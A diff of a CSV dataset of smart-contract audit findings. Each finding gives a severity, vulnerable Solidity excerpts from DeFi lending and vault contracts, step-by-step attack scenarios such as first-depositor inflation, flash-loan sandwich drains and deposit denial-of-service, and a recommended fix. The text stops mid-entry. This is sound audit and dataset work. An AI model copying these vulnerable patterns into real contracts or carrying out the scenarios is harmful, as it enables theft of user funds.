diff --git "a/db-vulnerable.csv" "b/db-vulnerable.csv" --- "a/db-vulnerable.csv" +++ "b/db-vulnerable.csv" @@ -1,1973 +1,1973 @@ -nameчseverityчdescriptionчrecommendationчimpactчfunction -On liquidation, if netPnLE36 <= 0, the premium paid by the liquidator is locked in the contract.чhighчWhen liquidating a position, the liquidator is required to pay premium to Lender, which is accumulated in sharingProfitTokenAmts together with Lender's profit and paid to Lender in `_shareProfitsAndRepayAllDebts()`.\\n```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nHowever, if netPnLE36 <= 0, `_shareProfitsAndRepayAllDebts()` will not pay any profit to Lender and the premium in sharingProfitTokenAmts will also not be paid to Lender, which means that the premium paid by the liquidator will be locked in the contract.\\n```\\n function _shareProfitsAndRepayAllDebts( address _positionManager, address _posOwner, uint _posId,\\n int _netPnLE36, uint[] memory _shareProfitAmts, address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. if net pnl is positive, share profits to lending proxy\\n if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n }\\n```\\n\\nAlso, when the position is closed, the tokens in the contract will be sent to the caller, so the next person who closes the position will get the locked tokens.\\n```\\n underlyingAmts = new uint[](underlyingTokens.length);\\n for (uint i; i < underlyingTokens.length; ) {\\n underlyingAmts[i] = IERC20(underlyingTokens[i]).balanceOf(address(this));\\n if (underlyingAmts[i] < _params.minUnderlyingAmts[i]) {\\n revert TokenAmountLessThanExpected(\\n underlyingTokens[i],\\n underlyingAmts[i],\\n _params.minUnderlyingAmts[i]\\n );\\n }\\n _doRefund(underlyingTokens[i], underlyingAmts[i]);\\n unchecked {\\n ++i;\\n }\\n```\\nчModify `shareProfitsAndRepayAllDebts()` as follows:\\n```\\n function _shareProfitsAndRepayAllDebts(\\n address _positionManager,\\n address _posOwner,\\n uint _posId,\\n int _netPnLE36,\\n uint[] memory _shareProfitAmts,\\n address[] memory _tokens,\\n OpenTokenInfo[] memory _openTokenInfos\\n ) internal {\\n // 0. load states\\n address _lendingProxy = lendingProxy;\\n // 1. if net pnl is positive, share profits to lending proxy\\n - if (_netPnLE36 > 0) {\\n for (uint i; i < _shareProfitAmts.length; ) {\\n if (_shareProfitAmts[i] > 0) {\\n ILendingProxy(_lendingProxy).shareProfit(_tokens[i], _shareProfitAmts[i]);\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n emit ProfitShared(_posOwner, _posId, _tokens, _shareProfitAmts);\\n - }\\n```\\nчч```\\n (\\n netPnLE36,\\n lenderProfitUSDValueE36,\\n borrowTotalUSDValueE36,\\n positionOpenUSDValueE36,\\n sharingProfitTokenAmts ) = calcProfitInfo(_positionManager, _user, _posId);\\n // 2. add liquidation premium to the shared profit amounts\\n uint lenderLiquidatationPremiumBPS = IConfig(config).lenderLiquidatePremiumBPS();\\n for (uint i; i < sharingProfitTokenAmts.length; ) {\\n sharingProfitTokenAmts[i] +=\\n (pos.openTokenInfos[i].borrowAmt * lenderLiquidatationPremiumBPS) / BPS;\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -The liquidated person can make the liquidator lose premium by adding collateral in advanceчhighчWhen the position with debtRatioE18 >= 1e18 or startLiqTimestamp ! = 0, the position can be liquidated. On liquidation, the liquidator needs to pay premium, but the profit is related to the position's health factor and deltaTime, and when discount == 0, the liquidator loses premium.\\n```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? ((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n\\nConsider the following scenario.\\nAlice notices Bob's position with debtRatioE18 >= 1e18 and calls `liquidatePosition()` to liquidate.\\nBob observes Alice's transaction, frontruns a call `markLiquidationStatus()` to make startLiqTimestamp == block.timestamp, and calls `adjustExtraColls()` to bring the position back to the health state.\\nAlice's transaction is executed, and since the startLiqTimestamp of Bob's position.startLiqTimestamp ! = 0, it can be liquidated, but since discount = 0, Alice loses premium. This breaks the protocol's liquidation mechanism and causes the liquidator not to launch liquidation for fear of losing assets, which will lead to more bad debtsчConsider having the liquidated person bear the premium, or at least have the liquidator use the minDiscount parameter to set the minimum acceptable discount.чч```\\n uint deltaTime;\\n // 1.1 check the amount of time since position is marked\\n if (pos.startLiqTimestamp > 0) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.startLiqTimestamp);\\n }\\n // 1.2 check the amount of time since position is past the deadline\\n if (block.timestamp > pos.positionDeadline) {\\n deltaTime = Math.max(deltaTime, block.timestamp - pos.positionDeadline);\\n }\\n // 1.3 cap time-based discount, as configured\\n uint timeDiscountMultiplierE18 = Math.max(\\n IConfig(config).minLiquidateTimeDiscountMultiplierE18(),\\n ONE_E18 - deltaTime * IConfig(config).liquidateTimeDiscountGrowthRateE18()\\n );\\n // 2. calculate health-based discount factor\\n uint curHealthFactorE18 = (ONE_E18 * ONE_E18) /\\n getPositionDebtRatioE18(_positionManager, _user, _posId);\\n uint minDesiredHealthFactorE18 = IConfig(config).minDesiredHealthFactorE18s(strategy);\\n // 2.1 interpolate linear health discount factor (according to the diagram in documentation)\\n uint healthDiscountMultiplierE18 = ONE_E18;\\n if (curHealthFactorE18 < ONE_E18) {\\n healthDiscountMultiplierE18 = curHealthFactorE18 > minDesiredHealthFactorE18\\n ? ((curHealthFactorE18 - minDesiredHealthFactorE18) * ONE_E18) /\\n (ONE_E18 - minDesiredHealthFactorE18)\\n : 0;\\n }\\n // 3. final liquidation discount = apply the two discount methods together\\n liquidationDiscountMultiplierE18 =\\n (timeDiscountMultiplierE18 * healthDiscountMultiplierE18) /\\n ONE_E18;\\n```\\n -First depositor can steal asset tokens of othersчhighчThe first depositor can be front run by an attacker and as a result will lose a considerable part of the assets provided. When the pool has no share supply, in `_mintInternal()`, the amount of shares to be minted is equal to the assets provided. An attacker can abuse of this situation and profit of the rounding down operation when calculating the amount of shares if the supply is non-zero.\\n```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n\\nConsider the following scenario.\\nAlice wants to deposit 2M * 1e6 USDC to a pool.\\nBob observes Alice's transaction, frontruns to deposit 1 wei USDC to mint 1 wei share, and transfers 1 M * 1e6 USDC to the pool.\\nAlice's transaction is executed, since _totalAsset = 1M * 1e6 + 1 and totalSupply = 1, Alice receives 2M * 1e6 * 1 / (1M * 1e6 + 1) = 1 share.\\nThe pool now has 3M*1e6 +1 assets and distributed 2 shares. Bob profits 0.5 M and Alice loses 0.5 M USDC.чWhen _totalSupply == 0, send the first min liquidity LP tokens to the zero address to enable share dilution Another option is to use the ERC4626 implementation(https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/extensions/ERC4626.sol#L199C14-L208) from OZ.чч```\\n function _mintInternal(address _receiver, uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n uint _totalSupply = totalSupply();\\n if (_totalAsset == 0 || _totalSupply == 0) {\\n mintShares = _balanceIncreased + _totalAsset;\\n } else {\\n mintShares = (_balanceIncreased * _totalSupply) / _totalAsset;\\n }\\n if (mintShares == 0) {\\n revert ZeroAmount();\\n }\\n _mint(_receiver, mintShares);\\n }\\n```\\n -The attacker can use larger dust when opening a position to perform griefing attacksчhighчWhen opening a position, unused assets are sent to dustVault as dust, but since these dust are not subtracted from inputAmt, they are included in the calculation of positionOpenUSDValueE36, resulting in a small netPnLE36, which can be used by an attacker to perform a griefing attack.\\n```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\nчConsider subtracting dust from inputAmt when opening a position.чч```\\n uint inputTotalUSDValueE36;\\n for (uint i; i < openTokenInfos.length; ) {\\n inputTotalUSDValueE36 += openTokenInfos[i].inputAmt * tokenPriceE36s[i];\\n borrowTotalUSDValueE36 += openTokenInfos[i].borrowAmt * tokenPriceE36s[i];\\n unchecked {\\n ++i;\\n }\\n }\\n // 1.3 calculate net pnl (including strategy users & borrow profit)\\n positionOpenUSDValueE36 = inputTotalUSDValueE36 + borrowTotalUSDValueE36;\\n netPnLE36 = positionCurUSDValueE36.toInt256() - positionOpenUSDValueE36.toInt256();\\n```\\n -An attacker can increase liquidity to the position's UniswapNFT to prevent the position from being closedчhighчUniswapV3NPM allows the user to increase liquidity to any NFT.\\n```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n\\nWhen closing a position, in `_redeemPosition()`, only the initial liquidity of the NFT will be decreased, and then the NFT will be burned.\\n```\\n function _redeemPosition(\\n address _user, uint _posId\\n ) internal override returns (address[] memory rewardTokens, uint[] memory rewardAmts) {\\n address _positionManager = positionManager;\\n uint128 collAmt = IUniswapV3PositionManager(_positionManager).getPositionCollAmt(_user, \\n _posId);\\n // 1. take lp & extra coll tokens from lending proxy\\n _takeAllCollTokens(_positionManager, _user, _posId, address(this));\\n UniV3ExtraPosInfo memory extraPosInfo = IUniswapV3PositionManager(_positionManager)\\n .getDecodedExtraPosInfo(_user, _posId);\\n address _uniswapV3NPM = uniswapV3NPM; // gas saving\\n // 2. remove underlying tokens from lp (internal remove in NPM)\\n IUniswapV3NPM(_uniswapV3NPM).decreaseLiquidity(\\n IUniswapV3NPM.DecreaseLiquidityParams({\\n tokenId: extraPosInfo.uniV3PositionId,liquidity: collAmt, amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n })\\n );\\n // rest of code\\n // 4. burn LP position\\n IUniswapV3NPM(_uniswapV3NPM).burn(extraPosInfo.uniV3PositionId);\\n }\\n```\\n\\nIf the liquidity of the NFT is not 0, burning will fail.\\n```\\n function burn(uint256 tokenId) external payable override isAuthorizedForToken(tokenId) {\\n Position storage position = _positions[tokenId];\\n require(position.liquidity == 0 && position.tokensOwed0 == 0 && position.tokensOwed1 == 0,'Not cleared');\\n delete _positions[tokenId];\\n _burn(tokenId);\\n }\\n```\\n\\nThis allows an attacker to add 1 wei liquidity to the position's NFT to prevent the position from being closed, and later when the position expires, the attacker can liquidate it.чConsider decreasing the actual liquidity(using uniswapV3NPM.positions to get it) of the NFT in `_redeemPosition()`, instead of the initial liquidityчч```\\n function increaseLiquidity(IncreaseLiquidityParams calldata params)\\n external payable override checkDeadline(params.deadline)\\n returns (\\n uint128 liquidity, uint256 amount0, uint256 amount1)\\n {\\n Position storage position = _positions[params.tokenId];\\n PoolAddress.PoolKey memory poolKey = _poolIdToPoolKey[position.poolId];\\n IUniswapV3Pool pool;\\n (liquidity, amount0, amount1, pool) = addLiquidity(\\n```\\n -SwapHelper.getCalldata should check whitelistedRouters[_router]чmediumч`SwapHelper.getCalldata()` returns data for swap based on the input, and uses whitelistedRouters to limit the _router param. The issue here is that when `setWhitelistedRouters()` sets the _routers state to false, it does not reset the data in routerTypes and swapInfos, which results in the router still being available in `getCalldata()`. As a result, users can still swap with invalid router data.\\n```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\nчConsider checking whitelistedRouters[_router] in SwapHelper.getCalldata()чч```\\n for (uint i; i < _statuses.length; ) {\\n whitelistedRouters[_routers[i]] = _statuses[i];\\n if (_statuses[i]) {\\n routerTypes[_routers[i]] = _types[i];\\n emit SetRouterType(_routers[i], _types[i]);\\n }\\n emit SetWhitelistedRouter(_routers[i], _statuses[i]);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -The swap when closing a position does not consider shareProfitAmtsчmediumчWhen closing a position, token swap is performed to ensure that the closer can repay the debt, for example, when operation == EXACT_IN, tokens of borrowAmt are required to be excluded from the swap, and when operation == EXACT_OUT, tokens of borrowAmt are required to be swapped. The issue here is that the closer needs to pay not only the borrowAmt but also the shareProfitAmts, which causes the closure to fail when percentSwapE18 = 100% due to insufficient tokens. Although the closer can adjust the percentSwapE18 to make the closure successful, it greatly increases the complexity.\\n```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\nчConsider taking shareProfitAmts into account when calculating swapAmtчч```\\n for (uint i; i < swapParams.length; ) {\\n // find excess amount after repay\\n uint swapAmt = swapParams[i].operation == SwapOperation.EXACT_IN\\n ? IERC20(swapParams[i].tokenIn).balanceOf(address(this)) - openTokenInfos[i].borrowAmt\\n : openTokenInfos[i].borrowAmt - IERC20(swapParams[i].tokenOut).balanceOf(address(this));\\n swapAmt = (swapAmt * swapParams[i].percentSwapE18) / ONE_E18\\n if (swapAmt == 0) {\\n revert SwapZeroAmount();\\n }\\n```\\n -The freeze mechanism reduces the borrowableAmount, which reduces Lender's yieldчmediumчThe contract has two freeze intervals, mintFreezeInterval and freezeBuckets.interval, the former to prevent users from making flash accesses and the latter to prevent borrowers from running out of funds. Both freeze intervals are applied when a user deposits, and due to the difference in unlocking time, it significantly reduces borrowableAmount and thus reduces Lender's yield.\\n```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n\\nConsider freezeBuckets.interval == mintFreezeInterval = 1 day, 100 ETH in the LendingPool, and borrowableAmount = 100 ETH. At day 0 + 1s, Alice deposits 50 ETH, borrowableAmount = 150 ETH**-** lockedAmount(50 ETH) = 100 ETH, the 50 ETH frozen in freezeBuckets will be unlocked on day 2, while unfreezeTime[alice] = day 1 + 1s. At day 1 + 1s, unfreezeTime[Alice] is reached, Alice can withdraw 50 ETH, borrowableAmount = 100 ETH - LockedAmount(50 ETH) = 50 ETH. If Bob wants to borrow the available funds in the Pool at this time, Bob can only borrow 50 ETH, while the available funds are actually 100 ETH, which will reduce Lender's yield by half. At day 2 + 1s, freezeBuckets is unfrozen and borrowableAmount = 100 ETH -LockedAmount(0 ETH) = 100 ETH.чConsider making mintFreezeInterval >= 2 * freezeBuckets.interval, which makes unfreezeTime greater than the unfreeze time of freezeBuckets.чч```\\n function _mintInternal(address _receiver,uint _balanceIncreased, uint _totalAsset\\n ) internal returns (uint mintShares) {\\n unfreezeTime[_receiver] = block.timestamp + mintFreezeInterval;\\n if (freezeBuckets.interval > 0) {\\n FreezeBuckets.addToFreezeBuckets(freezeBuckets, _balanceIncreased.toUint96());\\n }\\n```\\n -A malicious operator can drain the vault funds in one transactionчhighчThe vault operator can swap tokens using the `trade()` function. They pass the following structure for each trade:\\n```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n\\nNotably, receiveAmtMin is used to guarantee acceptable slippage. An operator can simply pass 0 to make sure the trade is executed. This allows an operator to steal all the funds in the vault by architecting a sandwich attack.\\nFlashloan a large amount of funds\\nSkew the token proportions in a pool which can be used for trading, by almost completely depleting the target token.\\nPerform the trade at >99% slippage\\nSell target tokens for source tokens on the manipulated pool, returning to the original ratio.\\nPay off the flashloan, and keep the tokens traded at 99% slippage. In fact, this attack can be done in one TX, different to most sandwich attacks.чThe contract should enforce sensible slippage parameters.чч```\\n struct tradeInput { \\n address spendToken;\\n address receiveToken;\\n uint256 spendAmt;\\n uint256 receiveAmtMin;\\n address routerAddress;\\n uint256 pathIndex;\\n }\\n```\\n -A malicious operator can steal all user depositsчhighчIn the Orbital architecture, each Vault user has a numerator which represents their share of the vault holdings. The denominator is by design the sum of all numerators of users, an invariant kept at deposits and withdrawals. For maximum precision, the denominator should be a very large value. Intuitively, numerators could be spread across different users without losing precision. The critical calculations occur in these lines in deposit():\\n```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n \"invalid sumDenoms\");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. \\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n\\nIn the initial deposit, Vault sums all token initialDenominators to get the final denominator. It is assumed that the vault will never have this amount in total balances (each token denominator is worth around $100m dollars).\\nIn any other deposit, the deltaN (numerator) credited to the depositor is (denominator * deposit amount / existing balance). When denominator is huge, this calculation is highly precise. However, when denominator is 1, a serious issue oc**curs. If user's deposit amount is one wei smaller than existing balance, deltaN would be zero. This property has lead to the well-known ERC4626 inflation attack, where an attacker donates (sends directly to the contract) an amount so that the following deposit is consumed without any shares given to the user. In fact, it is possible to reduce the denominator to 1 and resurrect that attack. The root cause is that the initial deposit denominator is not linear to the deposit amount. Consider the attack flow below, done by a malicious operator:\\nDeploy an ETH/BTC pool\\nFlash loan $100mm in ETH and BTC each\\nPerform an initial deposit of $100mm in ETH/BTC\\nFrom another account, deposit 1 wei ETH / BTC -> receive 1 deltaN\\nWithdraw 100% as operator, reducing denominator to 1.\\nPay off flash loan\\nWait for victim deposits\\nWhen a deposit arrives at the mempool, frontrun with a donation of an equivalent amount. The victim will not receive any shares ( numerator).\\nAny future deposits can be frontran again. Any deposit of less than the current balance will be lost.чConsider checking that user's received deltaN is reasonable. Calculate the expected withdrawable value (deltaN / denominator * balance), and verify that is close enough to the deposited amount.чч```\\n if (D == 0) { //initial deposit\\n uint256 sumDenoms = 0; \\n for (uint256 i = 0; i < tkns.length; i++) {\\n sumDenoms += \\n AI.getAllowedTokenInfo(tkns[i]).initialDenominator;\\n }\\n require(sumDenoms > 0 && sumDenoms <= maxInitialDenominator, \\n \"invalid sumDenoms\");\\n deltaN = sumDenoms; //initial numerator and denominator are the \\n same, and are greater than any possible balance in the vault.\\n //this ensures precision in the vault's \\n balances. User Balance = (N*T)/D will have rounding errors always 1 \\n wei or less. \\n } else { \\n // deltaN = (amt * D)/T;\\n deltaN = Arithmetic.overflowResistantFraction(amt, D, T);\\n }\\n```\\n -Removing a trade path in router will cause serious data corruptionчmediumчThe RouterInfo represents a single UniV3-compatible router which supports a list of token paths. It uses the following data structures:\\n```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n\\n```\\n struct listInfo {\\n bool allowed;\\n uint256 listPosition;\\n }\\n struct pair {\\n address token0;\\n address token1;\\n uint256 numPathsAllowed;\\n }\\n```\\n\\nWhen an admin specifies a new path from token0 to token1, `_increasePairPaths()` is called.\\n```\\n function _increasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n if (!LI.allowed){\\n LI.allowed = true;\\n LI.listPosition = allowedPairsList.length;\\n allowedPairsList.push(pair(token0, token1, 0));\\n }\\n allowedPairsList[LI.listPosition].numPathsAllowed++;\\n }\\n```\\n\\nWhen a path is removed, the complementary function is called.\\n```\\n function _decreasePairPaths(address token0, address token1) private {\\n listInfo storage LI = allowedPairsMap[token0][token1];\\n require(LI.allowed, \"RouterInfo: pair not allowed\");\\n allowedPairsList[LI.listPosition].numPathsAllowed--;\\n if (allowedPairsList[LI.listPosition].numPathsAllowed == 0){\\n allowedPairsList[LI.listPosition] = \\n allowedPairsList[allowedPairsList.length - 1];\\n allowedPairsList.pop();\\n LI.allowed = false;\\n }\\n }\\n```\\n\\nWhen the last path is removed, the contract reuses the index of the removed pair, to store the last pair in the list. It then removes the last pair, having already copied it. The issue is that the corresponding listInfo structure is not updated, to keep track of index in the pairs list. Future usage of the last pair will use a wrong index, which at this moment, is over the array bounds. When a new pair will be created, it will share the index with the corrupted pair. This can cause a variety of serious issues. For example, it will not be possible to remove paths from the corrupted pair until a new pair is created, at which point the new pair will have a wrong numPathsAllowed as it is shared.чUpdate the listPosition member of the last pair in the list, before repositioning it.чч```\\n mapping(address => mapping(address => listInfo)) private allowedPairsMap;\\n pair[] private allowedPairsList;\\n```\\n -Attacker can DOS deposit transactions due to strict verificationsчmediumчWhen users deposit funds to the Vault, it verifies that the proportion between the tokens inserted to the vault matches the current vault token balances.\\n```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), \"ratios don't match\");\\n```\\n\\nThe essential part of the check is below:\\n```\\n for (uint256 i = 0; i < sourceRatios.length; i++) {\\n // if (targetRatios[i] != (targetRatios[greatestIndex] * \\n sourceRatios[i]) / greatest) {\\n if (targetRatios[i] != \\n Arithmetic.overflowResistantFraction(targetRatios[greatestIndex], sourceRatios[i], greatest)) {\\n return false;\\n }\\n }\\n```\\n\\nThe exact logic here is not important, but note that a small change in the balance of one of the vault tokens will affect the expected number of tokens that need to be inserted to maintain correct ratio. The exact amounts to be deposited are passed as targetRatios, and sourceRatios is the current balances. Therefore, an attacker can directly transfer a negligible amount of some vault token to the contract to make the amount the user specified in targetRatios not line up with the expected proportion. As a result, the deposit would revert. Essentially it is an abuse of the over-granular verification of ratios, leading to a DOS of any deposit in the mempool.чLoosen the restriction on deposit ratios. A DOS attack should cost an amount that the vault creditors would be happy to live with.чч```\\n uint256[] memory balances = vlt.balances();\\n //ensure deposits are in the same ratios as the vault's current balances\\n require(functions.ratiosMatch(balances, amts), \"ratios don't match\");\\n```\\n -User deposits can fail despite using the correct method for calculation of deposit amountsчmediumчUsers can use the `getAmtsNeededForDeposit()` function to get the amount of tokens that maintain the desired proportion for vault deposits. It will perform a calculation very similar to the one in `ratiosMatch()`, which will verify the deposit.\\n```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n\\nHowever, a difference between the verification function and the getter function is that the getter receives any reference token, while the verification will use proportions based on the deposit amount in the largest balance in the vault. Indeed, these fractions may differ by a small amount. This could cause the `getAmtsNeededForDeposit()` function to respond with values which will not be accepted at deposit, since they will be rounded differently.чCalculation amounts needed using the ratio between largest balance and the deposit amount. This would line up the numbers as verification would expect.чч```\\n for (uint256 i = 0; i < balances.length; i++) {\\n if (i == indexOfReferenceToken) {\\n amtsNeeded[i] = amtIn;\\n } else {\\n // amtsNeeded[i] = (amtIn * balances[i]) / \\n balances[indexOfReferenceToken];\\n amtsNeeded[i] = Arithmetic.overflowResistantFraction(amtIn, \\n balances[i], balances[indexOfReferenceToken]);\\n }\\n }\\n```\\n -Several popular ERC20 tokens are incompatible with the vault due to MAX approveчlowчThere are several instances where the vault approves use of funds to the manager or a trade router. It will set approval to MAX_UINT256.\\n```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n\\nThe issue is that there are several popular tokens(https://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers) (UNI, COMP and others) which do not support allowances of above UINT_96. The contract will not be able to interoperate with them.чConsider setting allowance to UINT_96. Whenever the allowance is consumed, perform re-approval up to UINT_96.чч```\\n for (uint i = 0; i < tokens.length; i++) {\\n //allow vault manager to withdraw tokens\\n IERC20(tokens[i]).safeIncreaseAllowance(ownerIn, \\n type(uint256).max); \\n }\\n```\\n -Attacker can freeze deposits and withdrawals indefinitely by submitting a bad withdrawalчhighчUsers request to queue a withdrawal using the function below in Vault.\\n```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), \"ERROR: Invalid token\");\\n require(_amountMLP != 0, \"ERROR: Invalid amount\");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = _stagedBuffer.withdrawAmountPerUser[_withdrawer] + \\n _pendingBuffer.withdrawAmountPerUser[_withdrawer];\\n require(_bookedAmountMLP + _amountMLP <= \\n MozaicLP(mozLP).balanceOf(_withdrawer), \"Withdraw amount > amount MLP\");\\n …\\n emit WithdrawRequestAdded(_withdrawer, _token, chainId, _amountMLP);\\n }\\n```\\n\\nNotice that the function only validates that the user has a sufficient LP token balance to withdraw at the moment of execution. After it is queued up, a user can move their tokens to another wallet. Later in `_settleRequests()`, the Vault will attempt to burn user's tokens:\\n```\\n // Burn moazic LP token.\\n MozaicLP(mozLP).burn(request.user, _mlpToBurn);\\n```\\n\\nThis would revert and block any other settlements from occurring. Therefore, users can block the entire settlement process by requesting a tiny withdrawal amount in every epoch and moving funds to another wallet.чVault should take custody of user's LP tokens when they request withdrawals. If the entire withdrawal cannot be satisfied, it can refund some tokens back to the user.чч```\\n function addWithdrawRequest(uint256 _amountMLP, address _token) external {\\n require(isAcceptingToken(_token), \"ERROR: Invalid token\");\\n require(_amountMLP != 0, \"ERROR: Invalid amount\");\\n \\n address _withdrawer = msg.sender;\\n // Get the pending buffer and staged buffer.\\n RequestBuffer storage _pendingBuffer = _requests(false);\\n RequestBuffer storage _stagedBuffer = _requests(true);\\n // Check if the withdrawer have enough balance to withdraw.\\n uint256 _bookedAmountMLP = 